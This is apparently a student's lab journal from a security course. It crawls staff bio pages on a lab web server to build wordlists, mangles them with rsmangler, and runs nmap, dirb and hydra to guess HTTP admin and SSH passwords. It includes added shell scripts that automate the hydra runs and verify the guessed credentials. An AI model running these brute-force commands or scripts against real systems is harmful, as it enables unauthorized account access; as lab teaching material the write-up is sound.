Lab 5.1 Password Guessing - FlameSpyro/Tech-Journal GitHub Wiki
Lab 5.1 - Password Guessing
About
- This lab involves using tools against 10.0.5.21 to gather user information and get into the admin parts of the site.
Steps
Deliverable 1. Provide a screenshot that shows the lookup and reported hostname.
nslookup 10.0.5.21 10.0.5.22
Running some quick tests to uncover a few accounts that use easy-to-guess passwords can provide a simple initial foothold. We will come back to other password-cracking techniques later, in the exploit stage, since many of them are more useful once you already have some access to the systems.
Password-guessing tools use wordlists (dictionaries) to test combinations of usernames and passwords. Many lists are available to download, but crawling websites is a useful way to gather words and usernames that are uniquely associated with a particular organization.
The Custom Word List generator (cewl) included in Kali crawls websites and creates a custom wordlist. Spend some time reading the man page. You will need to play with the depth flag to single out a member's biography. cewl has some issues, and we will work through them as they appear.
I used cewl to create a custom wordlist for the Shire bio pages of Frodo, Pippin, Bilbo and Samwise from http://10.0.5.21/bios. Make sure you crawl the full bio page, not the shortened version shown on the index.
For this list it's best to keep:
- Unique words only
- Proper nouns
- A separate txt file for each user
Here's what I ran (-d 1 limits the crawl depth to one link from the bio page, -v is verbose, -w writes the list to a file):
cewl -d 1 -v http://10.0.5.21/bios/frodo -w frodoPass.txt
cewl -d 1 -v http://10.0.5.21/bios/pippin -w pippinPass.txt
cewl -d 1 -v http://10.0.5.21/bios/bilbo -w bilboPass.txt
cewl -d 1 -v http://10.0.5.21/bios/samwise -w samwisePass.txt
Mangling the Wordlist
- Making variants of your list of plaintext words is useful. Cagey users want an easy-to-remember password, but they also want to obfuscate it just a bit to feel secure.
rsmangler
rsmangler is a tool that takes a wordlist and "mangles" it: leet speak, appended numbers and years, case changes, special characters, permutations of the words, and various other rules selected by flags.
Here's what I used; each *PassSmall.txt is the trimmed-down version of the matching cewl list:
rsmangler --file bilboPassSmall.txt -x 12 -m 9 -l -s -e -i -p -u -a --output bilbo.mangled.txt
rsmangler --file frodoPassSmall.txt -x 12 -m 9 -l -s -e -i -p -u -a --output frodo.mangled.txt
rsmangler --file pippinPassSmall.txt -x 12 -m 9 -l -s -e -i -p -u -a --output pippin.mangled.txt
rsmangler --file samwisePassSmall.txt -x 12 -m 9 -l -s -e -i -p -u -a --output samwise.mangled.txt
rsmangler options used (-x and -m limit the output by word length, not word count; note also that in rsmangler every mangling rule is on by default and passing its flag turns that rule off, so compare this list against rsmangler --help on your version and check the output size before trusting it):
- -x: maximum word length
- -m: minimum word length
- -l: lowercase the word
- -p: permutate all words
- -s: swap the case of the word
- -e: add ed to the end of the word
- -i: add ing to the end of the word
- -u: uppercase the word
- -a: create an acronym based on all the words entered in order and add it to the word list
You can compare the sizes of the trimmed and mangled lists with:
wc -l *PassSmall.txt
wc -l *mangled.txt
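The trimming step (unique words, proper nouns, one file per user) and the mangling step are easy to sanity-check with a few shell functions. The script below is an added example written for this page, not cewl's or rsmangler's own code: it keeps only capitalised words from a cewl list, then applies a small subset of rsmangler-style rules (case changes, leet, ed/ing, years, acronym) so you can see how many candidates each word turns into. The rule set, the leet table, the year range and the sample input are my own assumptions.

```shell
#!/bin/sh
# Added example for this journal, not code from cewl or rsmangler. It trims a
# cewl wordlist down to unique proper nouns (the *PassSmall.txt step) and then
# applies a handful of rsmangler-style rules, so you can see what each rule
# contributes. The rule set, the leet table and the default year range are my
# own assumptions, not rsmangler's.

# Keep only capitalised words (proper nouns), drop duplicates and enforce a
# length window, the same idea as rsmangler's -m/-x minimum/maximum length.
trim_proper_nouns() {            # usage: trim_proper_nouns MIN MAX < cewl.txt
  grep -E '^[A-Z][a-z]+$' \
    | awk -v min="$1" -v max="$2" 'length($0) >= min && length($0) <= max' \
    | sort -u
}

# Variants of one word: lower/upper/capitalised, swapped case, a simple leet
# form, ed/ing suffixes, and a year appended to the capitalised and lowercase
# forms. Duplicates are dropped and the order is preserved.
mangle_word() {                  # usage: mangle_word WORD [FIRST_YEAR LAST_YEAR]
  w=$1; y=${2:-2015}; last=${3:-2024}
  lower=$(printf '%s' "$w" | tr 'A-Z' 'a-z')
  upper=$(printf '%s' "$w" | tr 'a-z' 'A-Z')
  cap=$(printf '%s' "$lower" | cut -c1 | tr 'a-z' 'A-Z')$(printf '%s' "$lower" | cut -c2-)
  swapped=$(printf '%s' "$w" | tr 'a-zA-Z' 'A-Za-z')
  leet=$(printf '%s' "$lower" | tr 'aeiost' '431057')   # assumed leet table
  {
    printf '%s\n' "$w" "$lower" "$upper" "$cap" "$swapped" "$leet" "${lower}ed" "${lower}ing"
    while [ "$y" -le "$last" ]; do
      printf '%s\n' "$cap$y" "$lower$y"
      y=$((y + 1))
    done
  } | awk '!seen[$0]++'
}

# Mangle every word on stdin and add the acronym of the whole list (rsmangler's
# acronym rule), de-duplicated across the entire output.
mangle_list() {                  # usage: mangle_list [FIRST_YEAR LAST_YEAR] < small.txt
  list=$(awk 'NF')                                      # non-empty lines only
  acronym=$(printf '%s\n' "$list" | cut -c1 | tr -d '\n')
  {
    printf '%s\n' "$list" | while IFS= read -r word; do
      if [ -n "$word" ]; then mangle_word "$word" "$@"; fi
    done
    if [ -n "$acronym" ]; then
      printf '%s\n' "$acronym" "$(printf '%s' "$acronym" | tr 'A-Z' 'a-z')"
    fi
  } | awk '!seen[$0]++'
}

# Constructed sample standing in for a cewl crawl (not real output from the lab):
# 6 crawled words shrink to 3 proper nouns, which mangle into 35 candidates.
demo_mangle() {
  printf 'Bilbo\nbag\nShire\nthe\nUnderhill\nBilbo\n' \
    | trim_proper_nouns 4 12 \
    | mangle_list 2020 2021
}

# Same size check the journal does with wc -l.
demo_mangle | wc -l
```

Feed it the same cewl output you would hand to rsmangler and compare wc -l before and after. If a real rsmangler run produces far fewer lines than this, look at the flags you passed: each one switches a rule off rather than on, and a minimum length like -m 9 silently drops a five-letter name such as bilbo unless some rule lengthens it first.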
Password Guessing
Deliverable 2. Using what you have during the reconnaissance modules, run a scan to determine any listening tcp services to include the service versions. Provide a screenshot of both your command and results.
nmap -sV 10.0.5.21
Deliverable 3. Let's see if we can get a little more information on your website such as hidden directories. Research the dirb command and run it against the webserver. Turn off recursion. Provide a screenshot of anything secret you've found.
dirb http://10.0.5.21 -r -w
- -r: don't search recursively
- -w: Do not stop on warning messages
Deliverable 4. Provide a screenshot that displays a prompt when attempting to access a protected directory.
In Chrome on Kali, enter:
10.0.5.21/admin
Note: check out Medusa, ncrack and hydra for options.
Cracking the HTTP password
- The usernames for our HTTP password-protected case are just the characters' first names: samwise, pippin, bilbo and frodo.
- Deliverable 5. For at least 3 shire staff, bypass authentication on the protected directory using the tool of your choice. Provide screenshot(s) showing the tool execution and the guessed password. (Make sure you validate that all of these work.)
- For this I used hydra, since I had used it in a previous lab:
hydra -l bilbo -P bilbo.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l frodo -P frodo.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l pippin -P pippin.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l samwise -P samwise.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
- BAM! We got login information
- Deliverable 5: hydra commands + successful logins
Brute Forcing System Accounts
Brute-forcing web logins can be much faster than brute-forcing some other services. SSH, for example, will often tear down the session after 3 failed logins, which slows down password-guessing attacks (hence -t 4 in the hydra commands below).
The target server also has SSH accounts for the same staff members, though their usernames are formatted first.lastname (pippin is a nickname, not a first name, and is not used).
Deliverable 6. Submit screenshots of your tool of choice reporting successful ssh password guesses of at least 3 member's linux accounts.
Here are the commands I used:
hydra -l bilbo.baggins -P bilbo.mangled.txt 10.0.5.21 -t 4 ssh
hydra -l frodo.baggins -P frodo.mangled.txt 10.0.5.21 -t 4 ssh
hydra -l samwise.gamgee -P samwise.mangled.txt 10.0.5.21 -t 4 ssh
WARNING: This took about 2-4 hours to do and for me didn't fully work, potentially due to my wordlist being cleared out too much.
Test each guess by logging in:
ssh first.lastname@10.0.5.21
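Deliverables 5 and 6 both come down to the same loop: one hydra run per user with that user's own list, then confirming the hit by hand. The script below is an added example written for this page, not the lab's or hydra's own code. It wraps the hydra commands above, parses the "login: ... password: ..." result lines hydra prints on a hit, and re-checks each HTTP hit with curl so only confirmed credentials go into the screenshot. TARGET, the log file names and the sample hydra log are my assumptions, and the passwords in the sample are made up.

```shell
#!/bin/sh
# Added example for this journal, not the lab's own commands or hydra's code:
# one hydra run per user with that user's mangled list, a parser for the
# "login: ... password: ..." lines hydra prints on a hit, and a curl re-check of
# every HTTP hit so nothing goes in the report unverified. TARGET, the log file
# names and the sample log below are my own assumptions.

TARGET=${TARGET:-10.0.5.21}

# hydra reports a hit as:
#   [80][http-get] host: 10.0.5.21   login: bilbo   password: <guess>
# Turn those lines into "user password" pairs; banner/status lines are ignored.
# The password is taken to the end of the line, so guesses with spaces survive.
parse_hydra_hits() {             # usage: parse_hydra_hits < hydra.log
  awk '/^\[[0-9]+\]\[[a-z-]+\] host: / {
         u = ""; p = ""
         if (match($0, /login: [^ ]+/))  u = substr($0, RSTART + 7, RLENGTH - 7)
         if (match($0, /password: .*$/)) { p = substr($0, RSTART + 10); sub(/[ \t]+$/, "", p) }
         if (u != "" && p != "") print u, p
       }'
}

# One hydra run per user, each with its own wordlist. -f stops at the first hit.
# For SSH, -t 4 keeps parallel sessions low: sshd drops a connection after a few
# failed attempts, so more threads only get you disconnected sooner.
guess_http() {                   # usage: guess_http USER WORDLIST
  hydra -l "$1" -P "$2" -s 80 -f "$TARGET" http-get /admin/ 2>&1 | tee -a hydra-http.log
}
guess_ssh() {                    # usage: guess_ssh first.lastname WORDLIST
  hydra -l "$1" -P "$2" -t 4 -f "$TARGET" ssh 2>&1 | tee -a hydra-ssh.log
}

# Re-check one HTTP Basic credential against /admin/: 200 means it works,
# 401 means hydra's hit was a false positive (or the password has changed).
check_http_cred() {              # usage: check_http_cred USER PASS   (prints status code)
  curl -s -o /dev/null -w '%{http_code}' -u "$1:$2" "http://$TARGET/admin/"
}

verify_http_hits() {             # usage: verify_http_hits < hydra-http.log
  parse_hydra_hits | while read -r u p; do
    printf '%s %s -> HTTP %s\n' "$u" "$p" "$(check_http_cred "$u" "$p")"
  done
}

# Constructed sample of hydra output (made-up passwords, not results from the
# lab) so the parser can be exercised without touching the target.
SAMPLE_HYDRA_LOG='[DATA] attacking http-get://10.0.5.21:80/admin/
[STATUS] 1234.00 tries/min, 1234 tries in 00:01h, 42 to do in 00:01h, 16 active
[80][http-get] host: 10.0.5.21   login: bilbo   password: Example1
[22][ssh] host: 10.0.5.21   login: bilbo.baggins   password: Shire 2020
1 of 1 target successfully completed, 1 valid password found'

demo_parse() {                   # returns the two "user password" pairs above
  printf '%s\n' "$SAMPLE_HYDRA_LOG" | parse_hydra_hits
}

# Only touch the target when asked: sh guess.sh run
if [ "${1:-}" = "run" ]; then
  for u in bilbo frodo pippin samwise; do
    guess_http "$u" "$u.mangled.txt"
  done
  verify_http_hits < hydra-http.log
fi
```

Save it as guess.sh in the directory holding the mangled lists and run sh guess.sh run; without the run argument it only defines the functions. SSH hits are still confirmed by logging in manually with ssh, since a non-interactive password login needs an extra tool, and an SSH run against a daemon that drops sessions after a few failures takes hours with any list of real size, so start the SSH loop last.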
Reflection
- When it comes to my passwords, mine aren't really that guessable; it's all about whether you know my very, very specific interest. I don't like to keep track, but some are shared depending on importance. I don't believe it's in a rockyou-like list. I keep track of passwords by physical means, but mostly through memory.